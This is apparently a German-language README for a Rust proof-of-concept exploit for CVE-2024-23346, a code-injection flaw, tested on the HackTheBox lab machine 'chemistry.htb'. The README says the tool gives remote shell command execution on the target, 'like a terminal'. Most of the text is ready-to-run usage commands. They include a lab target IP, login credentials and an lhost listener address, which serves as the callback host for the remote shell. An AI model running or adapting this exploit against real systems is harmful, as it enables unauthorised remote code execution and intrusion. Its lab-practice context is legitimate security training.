
Ein Rust-Exploit für CVE-2024-23346, der als "Terminal" fungiert (getestet auf chemistry.htb)
Ein Rust-Exploit-Skript für CVE-2024-23346.
Wie unten gezeigt, nutzt der POC die Code-Injection-Sicherheitslücke und führt Remote-Shell-Befehle wie in einem Terminal aus.
Schritte zum Ausführen des Exploits:
Cargo ausführen
cargo run -- --helpcargo run -- --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19ODER
cargo build -r (die Binärdatei befindet sich unter target/release/poc)./poc --help./poc --target http://10.10.11.38 --username "Admin" --password "Admin@123" --lhost 10.10.14.19Das Exploit-Skript ist inspiriert von Python Scripting Expert MAWK0235